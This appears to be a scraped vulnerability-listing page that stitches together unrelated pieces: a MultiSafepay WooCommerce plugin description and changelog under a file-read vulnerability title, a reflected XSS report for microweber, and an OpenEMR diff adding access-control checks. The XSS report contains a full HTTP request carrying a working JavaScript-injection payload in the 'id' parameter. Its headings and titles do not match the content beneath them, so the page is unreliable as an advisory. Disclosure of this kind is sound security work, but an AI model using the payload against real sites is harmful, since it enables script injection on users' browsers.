Unauthenticated Arbitrary File Read vulnerability in MultiSafepay plugin for WooCommerce plugin <= 4.13.1 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**About MultiSafepay**  
MultiSafepay is a collecting payment service provider which means we take care of the agreements, technical details and  
payment collection required for each payment method. You can start selling online today and manage all your transactions  
from one place.

**Supported Payment Methods**

Payment methods:  
\* AfterPay  
\* Alipay  
\* American Express  
\* Apple Pay  
\* Bank transfer  
\* Bancontact  
\* Belfius  
\* Betaal per Maand  
\* Dotpay  
\* E-Invoicing  
\* EPS  
\* Giropay  
\* iDEAL  
\* in3  
\* KBC/CBC  
\* Klarna  
\* Maestro  
\* Mastercard  
\* Pay After Delivery  
\* PayPal  
\* Paysafecard  
\* Request to Pay  
\* SEPA Direct Debit  
\* SOFORT Banking  
\* Trustly  
\* Visa

Giftcards:  
\* Baby Cadeaubon  
\* Beauty & Wellness  
\* Boekenbon  
\* Fashioncheque  
\* Fashion Giftcard  
\* Gezondheidsbon  
\* GivaCard  
\* Good4fun Giftcard  
\* Goodcard  
\* Fietsbon  
\* Nationale Tuinbon  
\* Parfum Cadeaukaart  
\* Podium  
\* Sport & Fit  
\* VVV Giftcard  
\* Webshop gift card  
\* Wellness gift card  
\* Wijncadeau  
\* Winkelcheque  
\* YourGift

To use the plugin you need a MultiSafepay account.  
Create an account

**Automatic Installation**

*   Search for the ‘MultiSafepay’ plugin via ‘Add New’ from the WordPress menu
*   Press the ‘Install now’ button

**Manual Installation**

*   Download the plugin from the WordPress Plugin Directory
*   Unzip the downloaded file to a local directory
*   Upload the directory ‘multisafepay’ to /wp-content/plugins/ on the remote server

**Configuration**

*   Activate the ‘MultiSafepay’ plugin via ‘Plugin’ from the WordPress menu
*   Navigate to _WooCommerce_ -> _MultiSafepay Settings_
*   In _Account_ tab, set the API key. Information about the API key can be found on our API key page. Click on _Save changes_ button.
*   Go to _Order Status_ tab and confirm the match between WooCommerce order statuses and MultiSafepay order statuses. Click on _Save changes_ button.
*   Go to _Options_ tab and confirm the settings for each field. Click on _Save changes_ button.
*   Navigate to _WooCommerce_ -> _Settings_ -> _Payments_. Click on the payment methods you would like to offer, check and set or confirm the settings for those been enable. Click on _Save changes_ button.

**How can I install the plugin for WooCommerce?**

*   Installation instruction can be found in our Manual page.

**How can I update the plugin for WooCommerce?**

Before you update the plugin, we strongly recommend you the following:

*   Make sure you have a backup of your production environment
*   Test the plugin in a staging environment.
*   Go to our Manual page, download the plugin and follow the instructions from step 2.

**How can I generate a payment link in the backend of WooCommerce?**

It is possible to generate a payment link when an order has been created at the backend in WooCommerce.  
The customer will receive the payment link in the email send by WooCommerce with the order details. Also the payment link will be added to the order notes.

Please follow these steps:

1.  Login into your backend and navigate to WooCommerce -> Orders -> Add order.
2.  Register the order details as explained in WooCommerce documentation.
3.  In “Order actions” panel; select the option “Email invoice / order details to customer”.
4.  Click on “Create” order button.
5.  An email will be sended to the customer with the details of the order and a payment link to finish the order.
6.  The payment link will be available for the customer in their private account area, in “Orders” section.

**Can I refund orders?**

Yes, you can fully or partially refund transactions directly from your WooCommerce backend for all payment methods, except for Billing Suite payment methods in which it is only possible to process full refunds.  
You can also refund from your MultiSafepay Control

MultiSafe plugin is nice as the plugin shows available currency Based on Geolocation IP.

Smoothless integration of the world's most versatile payment system into Woocommerce

Read all 2 reviews

“MultiSafepay plugin for WooCommerce” is open source software. The following people have contributed to this plugin.

Contributors

*    multisafepayplugin

**Release Notes – WooCommerce 4.17.2 (Jul 22st, 2022)****Fixed**

*   PLGWOOS-825: Fix an issue in which some payment methods are not being shown in the checkout, because of the setting field country selector is assuming the wrong value in some cases

**Release Notes – WooCommerce 4.17.1 (Jul 22st, 2022)****Changed**

*   PLGWOOS-817: Improvement in the escaping of the outputs of the settings page

**Release Notes – WooCommerce 4.17.0 (Jul 21st, 2022)****Removed**

*   PLGWOOS-816: Remove validation to check if a gateway is enabled in the merchant account, before activate the WooCommerce payment method
*   PLGWOOS-818: Remove upgrade notice functionality in plugin list page

**Changed**

*   PLGWOOS-817: Improvement in sanitization and validation of the inputs, and escaping the outputs

**Release Notes – WooCommerce 4.16.0 (Jul 20th, 2022)****Added**

*   DAVAMS-490: Add MyBank payment method

**Removed**

*   PLGWOOS-811: Remove download plugin logs button and related methods

**Release Notes – WooCommerce 4.15.0 (May 25th, 2022)****Added**

*   DAVAMS-470: Add terms and conditions checkbox to AfterPay

**Changed**

*   PLGWOOS-805: Declare support for WordPress 6.0

**Release Notes – WooCommerce 4.14.0 (May 19th, 2022)****Added**

*   DAVAMS-476: Add Alipay+

**Changed**

*   PLGWOOS-804: Use default locale if get\_locale returns null to prevent third party plugin errors
*   PHPSDK-93: Upgrade the PHP-SDK dependency to 5.5.0

**Release Notes – WooCommerce 4.13.1 (Mar 23th, 2022)****Added**

*   PLGWOOS-792: Declare support for WordPress 5.9.2 and WooCommerce 6.3.1
*   PLGWOOS-790: Improvement on debug mode, logging the body of the POST notification request

**Fixed**

*   PLGWOOS-791: Fix error when WooCommerce order is not found after receive a valid POST notification

**Release Notes – WooCommerce 4.13.0 (Feb 1st, 2022)****Added**

*   PLGWOOS-770: Add payment component support for payment options: Visa, Mastercard, Maestro and American Express
*   PLGWOOS-774: Add support to process ‘smart\_coupon’ coupons from Smart Coupons third party plugin
*   PLGWOOS-775: Log shopping cart content when debug mode is enabled

**Release Notes – WooCommerce 4.12.0 (Jan 13th, 2022)****Added**

*   PLGWOOS-769: Add new filter ‘multisafepay\_merchant\_item\_id’ to allow third party developers overwrite the merchant\_item\_id property within the ShoppingCart object

**Changed**

*   PLGWOOS-744: Update ‘Betaal per Maand’ default max\_amount value, according with new product rules
*   PLGWOOS-759: Rebrand Sofort payment method

**Release Notes – WooCommerce 4.11.0 (Jan 4th, 2022)****Added**

*   PLGWOOS-745: Add Payment Component

**Changed**

*   PLGWOOS-765: Refactor PaymentMethodsController::generate\_orders\_from\_backend() to work only with one argument and avoiding conflicts with third party plugins
*   PLGWOOS-745: Tokenization now works through the Payment Component

**Fixed**

*   PLGWOOS-763: Fix error on plugin list when application can not connect with wordpress network

**Release Notes – WooCommerce 4.10.0 (Dec 13th, 2021)****Added**

*   PLGWOOS-748: Add PHP-SDK version to system report
*   PLGWOOS-758: Add filter to turn notifications to GET method

**Removed**

*   DAVAMS-460: Remove ING Home’Pay

**Changed**

*   PLGWOOS-695: Replace HTTP Client, use WP\_HTTP instead kriswallsmith/buzz
*   PLGWOOS-749: Replace logo of Bancontact for new one

**Fixed**

*   PLGWOOS-752: Fix missing placeholder for Test API Key input field in settings page

**Release Notes – WooCommerce 4.9.0 (Oct 18th, 2021)****Added**

*   PLGWOOS-715: Add 2 “Generic Gateways” which include a flexible gateway code that allows any merchant to connect to almost every payment method we offer.
*   PLGWOOS-746: Declare support for WordPress 5.8.1 and WooCommerce 5.8.0

**Changed**

*   PLGWOOS-740: Improve the helper text of the Google Analytics ID setting field, adding a link to Documentation Center
*   PLGWOOS-747: Upgrade the PHP-SDK component to 5.3.0

**Fixed**

*   PLGWOOS-739: Fix fatal error related with undefined method when processing orders using iDEAL QR
*   PLGWOOS-743: Fix broken links to Documentation Center in settings page

**Release Notes – WooCommerce 4.8.3 (Sep 6th, 2021)****Fixed**

*   PLGWOOS-737: Fix error related with refunds by updating the PHP-SDK to 5.2.1

**Release Notes – WooCommerce 4.8.2 (Sep 2nd, 2021)****Added**

*   PLGWOOS-730: Declare support for WooCommerce 5.6.0

**Release Notes – WooCommerce 4.8.1 (Aug 9th, 2021)****Fixed**

*   PLGWOOS-727: Show error message from the API in the checkout page, when there is an error on direct transactions

**Release Notes – WooCommerce 4.8.0 (Aug 4th, 2021)****Added**

*   PLGWOOS-723: Declare support for WooCommerce 5.5.2 and WordPress 5.8
*   PLGWOOS-711: Add missing titles in setting pages

**Changed**

*   PLGWOOS-718: Remove PSP ID string when register the transaction ID in WC\_Order->payment\_complete()

**Release Notes – WooCommerce 4.7.0 (Jun 23th, 2021)****Added**

*   PLGWOOS-706: Declare support for WooCommerce 5.4.1

**Changed**

*   PLGWOOS-672: Change notification method from GET to POST by default

**Fixed**

*   PLGWOOS-704: Log errors in the MultiSafepay log file, when processing notifications.

**Release Notes – WooCommerce 4.6.0 (May 19th, 2021)****Added**

*   PLGWOOS-625: Add log section in MultiSafepay settings page
*   PLGWOOS-666: Add MultiSafepay system status section in settings page
*   PLGWOOS-376: Add support to show upgrade notices in plugin list
*   PLGWOOS-657: Add nl\_BE language

**Fixed**

*   PLGWOOS-694: Fix notification for orders fully paid with gift cards
*   PLGWOOS-692: Fix Second Chance within the orderRequest object
*   PLGWOOS-654: Fix the gateway\_id assigned to the properties of each token

**Release Notes – WooCommerce 4.5.1 (Apr 7th, 2021)****Fixed**

*   PLGWOOS-661: Fix payment methods ids to match list of gateway lists keys, which was producing an error to process notification for Sofort payments
*   PLGWOOS-663: Fix stock decreasing error, in relation with Bank Transfer gateway and notification flows

**Release Notes – WooCommerce 4.5.0 (Mar 31th, 2021)****Fixed**

*   PLGWOOS-659: Fix initialization of the plugin on multisite environments in which WooCommerce has been activate network wide

**Added**

*   PLGWOOS-534: Add generic gateway

**Release Notes – WooCommerce 4.4.1 (Mar 25th, 2021)****Fixed**

*   PLGWOOS-653: Fix overwriting initial order status when transaction is initialized

**Release Notes – WooCommerce 4.4.0 (Mar 23th, 2021)****Fixed**

*   PLGWOOS-648: Return 0 as tax rate, if WooCommerce taxes are disabled but tax rules are registered
*   PLGWOOS-647: Add verification to check if the token used in the transaction belongs to the customer

**Added**

*   PLGWOOS-651: Add setting to select type of transaction in SEPA Direct Debit, E-Invoicing, in3, Santander Consumer Finance, AfterPay and iDEAL
*   PLGWOOS-644: Add setting to select type of transaction in Pay After Delivery
*   PLGWOOS-640: Add setting to select type of transaction in Bank Transfer

**Release Notes – WooCommerce 4.3.0 (Mar 18th, 2021)****Fixed**

*   PLGWOOS-626: Fix order not being cancelled when customer cancels the order
*   PLGWOOS-630: Fix include shipping item in full refund of billing suite payment methods

**Added**

*   PLGWOOS-629: Add shipping item to the order request, even if this one is free
*   PLGWOOS-631: Add delivery address in order request even if the shipping amount is 0
*   PLGWOOS-634: Add settings field to redirect to checkout page or cart page on cancelling the order
*   PLGWOOS-635: Add suggestion to set default initial order status for bank transfer to wc-on-hold
*   PLGWOOS-636: Add notification endpoint from version 3.8.0 to process deprecated notifications

**Changed**

*   PLGWOOS-622: Change notification url for all payment methods to a single notification url

**Release Notes – WooCommerce 4.2.2 (Mar 16th, 2021)****Fixed**

*   PLGWOOS-632: Fix undefined method get\_the\_user\_ip
*   PLGWOOS-621: Fix division by zero when fee price is 0

**Release Notes – WooCommerce 4.2.1 (Mar 11th, 2021)****Fixed**

*   PLGWOOS-613: Fix error related with multiple forwarded IPs by updating the PHP-SDK to 5.0.1

**Added**

*   PLGWOOS-398: Add support to change the data in the OrderRequest using WordPress filters

**Changed**

*   PLGWOOS-614: Avoid changing order status if transaction is partially refunded

**Release Notes – WooCommerce 4.2.0 (Mar 9th, 2021)****Changed**

*   PLGWOOS-602: Move invoice and shipped settings field from order status tab to options tab
*   PLGWOOS-602: Remove completed status from order status tab in settings page
*   PLGWOOS-601: Change default status for declined transactions from wc-cancelled to wc-failed

**Fixed**

*   PLGWOOS-599: Fix typo in string message when payment method changes
*   PLGWOOS-598: Replace hardcoded url using plugins\_url function
*   PLGWOOS-605: Fix description of country filter field

**Added**

*   PLGWOOS-603: Add setting field for custom order description
*   PLGWOOS-604: Add forwarded IP to the CustomerDetails object
*   PLGWOOS-597: Support for orders with is\_vat\_exempt
*   PLGWOOS-606: Add chargedback transaction status in plugin settings

**Release Notes – WooCommerce 4.1.8 (Mar 5th, 2021)****Changed**

*   PLGWOOS-593: Register PSP ID in WooCommerce order using order complete payment method
*   PLGWOOS-593: Change notification method on completed status to use $order->complete\_payment()

**Fixed**

*   PLGWOOS-594: Fix Credit Card payment method form, to show description if customer is not logged in

**Release Notes – WooCommerce 4.1.7 (Mar 3th, 2021)****Changed**

*   PLGWOOS-579: Remove warning message on validation, when enabling CREDITCARD gateway

**Fixed**

*   PLGWOOS-584: Fix conflict with third party plugins related with Discovery exception
*   PLGWOOS-585: Set MultiSafepay transaction as shipped or invoiced using order number instead of order id

**Release Notes – WooCommerce 4.1.6 (Mar 2nd, 2021)****Added**

*   PLGWOOS-574: Add locale support

**Changed**

*   PLGWOOS-575: Change settings page capability requirement from manage\_options to manage\_woocommerce

**Fixed**

*   PLGWOOS-580: Show credit card payment method description in checkout
*   PLGWOOS-569: Remove class that trigger validation styles for ideal select in checkout page

**Release Notes – WooCommerce 4.1.5 (Feb 24th, 2021)****Fixed**

*   PLGWOOS-552: Fix product item price with discounts introduced by third party plugins (#252)

**Release Notes – WooCommerce 4.1.4 (Feb 23th, 2021)****Fixed**

*   PLGWOOS-563: Remove some nonce validations to support custom checkouts forms (#249)
*   PLGWOOS-550: Typecast cart item quantity to int to avoid errors in the PHP-SDK (#248)

**Changed**

*   PLGWOOS-556: Change composer dependencies to avoid conflicts with other plugins (#247)
*   PLGWOOS-562: Add fallback for in3, in case no fields is filled in checkout, convert the transaction to redirect type (#250)

**Release Notes – WooCommerce 4.1.3 (Feb 21th, 2021)****Fixed**

*   PLGWOOS-549: Support custom order numbers generated by third party plugins in notification method
*   PLGWOOS-551: Resize logo if theme used by merchant do not support WooCommerce

**Release Notes – WooCommerce 4.1.2 (Feb 19th, 2021)****Fixed**

*   PLGWOOS-548: Fix iDEAL gateway if no issuer selected in checkout

**Release Notes – WooCommerce 4.1.1 (Feb 18th, 2021)****Changed**

*   PLGWOOS-545: Remove API Key validation

**Release Notes – WooCommerce 4.1.0 (Feb 17th, 2021)****Added**

*   PLGWOOS-512: Add support for tokenization.
*   PLGWOOS-521: Change order status on callback even if merchant did not save the settings, using defaults.
*   PLGWOOS-530: Process notification, even when the payment method returned by MultiSafepay is not registered as WooCommerce gateway.
*   PLGWOOS-531: Avoid process refund if amount submited in backend is 0

**Fixed**

*   PLGWOOS-535: Fix bug min\_amount filter
*   PLGWOOS-536: Fix instructions in multi select country field
*   PLGWOOS-518: Fix protocol of notification URL
*   PLGWOOS-526: Fix typo error in AfterPay payment method title
*   PLGWOOS-523: Fix type of transaction to redirect for Dotpay payment method

**Changed**

*   PLGWOOS-519: Improvement for coupons support in ShoppingCart.
*   PLGWOOS-528: Refactor gender and salutation fields to process different validation messages
*   PLGWOOS-503: Move debug mode field to options section

**Removed**

*   PLGWOOS-525: Remove validation in backend for MultiSafepay payment method
*   PLGWOOS-516: Avoid initialize the plugin if WooCommerce is not active

**Release Notes – WooCommerce 4.0.0 (internal release) (Feb 12th, 2021)****Added**

*   Complete rewrite of the plugin
*   Full and partial refunds for non billing suite payment methods
*   Full refunds for billing suite payment methods
*   Set MultiSafepay transactions as shipped when order reach the defined status in settings
*   Set MultiSafepay transaction as invoiced when order reach the defined status in settings
*   Filter payment methods by country
*   Filter payment methods by maximum amount of order
*   Filter payment methods by minimum amount of order
*   Custom initialized status for each payment method
*   Validations in backend settings fields
*   Support for compound taxes

**Changed**

*   PLGWOOS-410: Refactor plugin using the PHP-SDK

**Removed**

*   Remove FastCheckout

CVE-2022-33901: MultiSafepay plugin for WooCommerce

Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.21.

**Description**

Hi team, I found XSS at /module/.

**Proof of Concept**

Pop up POC: 

Reflected POC: 

Full request payload:

    POST /demo/module/ HTTP/1.1
    Host: demo.microweber.org
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Content-Length: 183
    Origin: https://demo.microweber.org
    Referer: https://demo.microweber.org/demo/shop
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: cross-site
    Te: trailers
    Connection: close
    
    type=shop%2Fcheckout&template=modal&id=js-ajax-cart');});function%20$(num1){alert(1);return%20String(num1)}$(document).ready(function%20()%20{mw.$('-checkout-process&class=no-settings
    

**Impact**

XSS

**Occurrences**

index.php L80-L92

This function does not filter 'id' parameter in script tag, which allows attackers to escape syntax using apostrophe.

CVE-2022-2470: Cross-site Scripting (XSS) - Reflected in microweber

Data Access from Outside Expected Data Manager Component in GitHub repository openemr/openemr prior to 7.0.0.

@@ -16,6 +16,7 @@

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Crypto\\CryptoGen;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Services\\FacilityService;

use OpenEMR\\Services\\PatientService;

  

@@ -1063,9 +1064,17 @@ public function list\_action($patient\_id = "")

$cur\_pid = isset($\_GET\['patient\_id'\]) ? filter\_input(INPUT\_GET, 'patient\_id') : '';

$used\_msg = xl('Current patient unavailable here. Use Patient Documents');

if ($cur\_pid == '00') {

if (!AclMain::aclCheckCore('patients', 'docs', '', \['write', 'addonly'\])) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Documents")\]);

exit;

}

$cur\_pid = '0';

$is\_new = 1;

}

if (!AclMain::aclCheckCore('patients', 'docs')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Documents")\]);

exit;

}

$this\->assign('is\_new', $is\_new);

$this\->assign('place\_hld', $place\_hld);

$this\->assign('cur\_pid', $cur\_pid);

@@ -1,5 +1,8 @@

<?php

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

  

class C\_PracticeSettings extends Controller

{

var $template\_mod;

@@ -14,6 +17,11 @@ function \_\_construct($template\_mod = "general")

$this\->assign("TOP\_ACTION", $GLOBALS\['webroot'\] . "/controller.php?" . "practice\_settings" . "&");

$this\->assign("STYLE", $GLOBALS\['style'\]);

$this\->direction = ($GLOBALS\['\_SESSION'\]\['language\_direction'\] == 'rtl') ? 'right' : 'left';

  

if (!AclMain::aclCheckCore('admin', 'practice')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Practice Settings")\]);

exit;

}

}

  

function default\_action($display = "")

@@ -27,8 +27,15 @@

require\_once("$srcdir/options.inc.php");

require\_once("$srcdir/payment.inc.php");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

if (!AclMain::aclCheckCore('acct', 'bill', '', 'write') && !AclMain::aclCheckCore('acct', 'eob', '', 'write')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Confirm Payment")\]);

exit;

}

  

$screen = 'edit\_payment';

  

// Deletion of payment distribution code

@@ -23,10 +23,17 @@

  

use OpenEMR\\Billing\\ParseERA;

use OpenEMR\\Billing\\SLEOB;

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

use OpenEMR\\OeUI\\OemrUI;

  

if (!AclMain::aclCheckCore('acct', 'bill', '', 'write') && !AclMain::aclCheckCore('acct', 'eob', '', 'write')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("ERA Posting")\]);

exit;

}

  

$hidden\_type\_code = isset($\_POST\['hidden\_type\_code'\]) ? $\_POST\['hidden\_type\_code'\] : '';

$check\_date = isset($\_POST\['check\_date'\]) ? $\_POST\['check\_date'\] : '';

$post\_to\_date = isset($\_POST\['post\_to\_date'\]) ? $\_POST\['post\_to\_date'\] : '';

@@ -17,9 +17,16 @@

require\_once("../globals.php");

require\_once("$srcdir/patient.inc");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

if (!AclMain::aclCheckCore('acct', 'rep\_a')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Indigent Patients Report")\]);

exit;

}

  

$alertmsg = '';

  

function bucks($amount)

@@ -25,9 +25,16 @@

require\_once("$srcdir/payment.inc.php");

  

use OpenEMR\\Billing\\ParseERA;

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

use OpenEMR\\OeUI\\OemrUI;

  

if (!AclMain::aclCheckCore('acct', 'bill', '', 'write') && !AclMain::aclCheckCore('acct', 'eob', '', 'write')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("New Payment")\]);

exit;

}

  

//===============================================================================

$screen = 'new\_payment';

//===============================================================================

@@ -23,9 +23,16 @@

require\_once("$srcdir/options.inc.php");

require\_once("$srcdir/payment.inc.php");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

use OpenEMR\\OeUI\\OemrUI;

  

if (!AclMain::aclCheckCore('acct', 'bill', '', 'write') && !AclMain::aclCheckCore('acct', 'eob', '', 'write')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Search Payment")\]);

exit;

}

  

//===============================================================================

//Deletion of payment and its corresponding distributions.

//===============================================================================

@@ -36,10 +36,17 @@

use OpenEMR\\Billing\\InvoiceSummary;

use OpenEMR\\Billing\\ParseERA;

use OpenEMR\\Billing\\SLEOB;

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

use OpenEMR\\OeUI\\OemrUI;

  

if (!AclMain::aclCheckCore('acct', 'eob', '', 'write')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("EOB Posting - Search")\]);

exit;

}

  

$DEBUG = 0; // set to 0 for production, 1 to test

$alertmsg = '';

$where = '';

@@ -36,8 +36,14 @@

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

if (!AclMain::aclCheckCore('acct', 'rep') && !AclMain::aclCheckCore('acct', 'rep\_a')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Cash Receipts by Provider")\]);

exit;

}

  

function is\_clinic($code)

{

global $bcodes;

@@ -60,11 +66,6 @@ function bucks($amount)

}

}

  

if (! AclMain::aclCheckCore('acct', 'rep')) {

die(xlt("Unauthorized access."));

}

  

  

$form\_use\_edate = $\_POST\['form\_use\_edate'\] ?? null;

  

$form\_proc\_codefull = trim($\_POST\['form\_proc\_codefull'\] ?? '');

@@ -373,6 +374,11 @@ function sel\_diagnosis() {

<?php

if ($\_POST\['form\_refresh'\]) {

$form\_doctor = $\_POST\['form\_doctor'\];

if (!AclMain::aclCheckCore('acct', 'rep\_a')) {

// only allow user to see their encounter information

$form\_doctor = $\_SESSION\['authUserID'\];

}

  

$arows = array();

  

$ids\_to\_skip = array();

@@ -18,8 +18,15 @@

require\_once('../globals.php');

require\_once("$srcdir/patient.inc");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

if (!AclMain::aclCheckCore('patients', 'lab')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Lab Documents")\]);

exit;

}

  

$curdate = date\_create(date("Y-m-d"));

date\_sub($curdate, date\_interval\_create\_from\_date\_string("7 days"));

$sub\_date = date\_format($curdate, 'Y-m-d');

@@ -17,6 +17,7 @@

require\_once("$srcdir/lab.inc");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

// Indicates if we are entering in batch mode.

@@ -26,15 +27,17 @@

$form\_review = empty($\_GET\['review'\]) ? 0 : 1;

  

// Check authorization.

$thisauth = AclMain::aclCheckCore('patients', 'med');

$thisauth = AclMain::aclCheckCore('patients', 'lab');

if (!$thisauth) {

die(xlt('Not authorized'));

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Procedure Results")\]);

exit;

}

  

// Check authorization for pending review.

$reviewauth = AclMain::aclCheckCore('patients', 'sign');

if ($form\_review and !$reviewauth and !$thisauth) {

die(xlt('Not authorized'));

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Procedure Results")\]);

exit;

}

  

// Set pid for pending review.

@@ -18,8 +18,14 @@

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

if (!AclMain::aclCheckCore('patients', 'lab')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Pending Orders")\]);

exit;

}

  

function thisLineItem($row)

{

$provname = $row\['provider\_lname'\];

@@ -53,10 +59,6 @@ function thisLineItem($row)

} // End not csv export

}

  

if (!AclMain::aclCheckCore('acct', 'rep')) {

die(xlt("Unauthorized access."));

}

  

$form\_from\_date = isset($\_POST\['form\_from\_date'\]) ? DateToYYYYMMDD($\_POST\['form\_from\_date'\]) : date('Y-m-d');

$form\_to\_date = isset($\_POST\['form\_to\_date'\]) ? DateToYYYYMMDD($\_POST\['form\_to\_date'\]) : date('Y-m-d');

$form\_facility = $\_POST\['form\_facility'\] ?? null;

@@ -22,12 +22,12 @@

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

// Might want something different here.

//

if (! AclMain::aclCheckCore('acct', 'rep')) {

die(xlt("Unauthorized access."));

if (!AclMain::aclCheckCore('patients', 'lab')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Procedure Statistics Report")\]);

exit;

}

  

$from\_date = isset($\_POST\['form\_from\_date'\]) ? DateToYYYYMMDD($\_POST\['form\_from\_date'\]) : '0000-00-00';

@@ -15,6 +15,8 @@

  

require\_once("../globals.php");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

// This script can be run either inside the OpenEMR frameset for order catalog

@@ -26,6 +28,15 @@

$order = isset($\_GET\['order'\]) ? $\_GET\['order'\] + 0 : 0;

$labid = isset($\_GET\['labid'\]) ? $\_GET\['labid'\] + 0 : 0;

  

if (!$popup && !AclMain::aclCheckCore('admin', 'super')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Configure Orders and Results")\]);

exit;

}

if ($popup && !AclMain::aclCheckCore('patients', 'lab') && !AclMain::aclCheckCore('admin', 'super')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Configure Orders and Results")\]);

exit;

}

  

// If Save was clicked, set the result, close the window and exit.

//

if ($popup && $\_POST\['form\_save'\]) {

@@ -17,8 +17,15 @@

  

require\_once(dirname(\_\_FILE\_\_) . "../../globals.php");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

if (!AclMain::aclCheckCore('patients', 'med', '', 'write')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("Import")\]);

exit;

}

  

?>

<html\>

<head\>

@@ -18,9 +18,16 @@

require\_once(dirname(\_\_FILE\_\_) . "/../../library/patient.inc");

require\_once(dirname(\_\_FILE\_\_) . "/../../library/parse\_patient\_xml.php");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Csrf\\CsrfUtils;

use OpenEMR\\Common\\Twig\\TwigContainer;

use OpenEMR\\Core\\Header;

  

if (!AclMain::aclCheckCore('patients', 'med', '', 'write')) {

echo (new TwigContainer(null, $GLOBALS\['kernel'\]))->getTwig()->render('core/unauthorized.html.twig', \['pageTitle' => xl("CCR Approve")\]);

exit;

}

  

if (isset($\_GET\['approve'\]) && $\_GET\['approve'\] == 1) {

if (!CsrfUtils::verifyCsrfToken($\_GET\["csrf\_token\_form"\])) {

CsrfUtils::csrfNotVerified();

@@ -13,6 +13,11 @@

\*/

  

require\_once("../../globals.php");

require\_once("../../../library/registry.inc");

  

use OpenEMR\\Common\\Acl\\AclMain;

use OpenEMR\\Common\\Twig\\TwigContainer;

  

if (substr($\_GET\["formname"\], 0, 3) === 'LBF') {

// Use the List Based Forms engine for all LBFxxxxx forms.

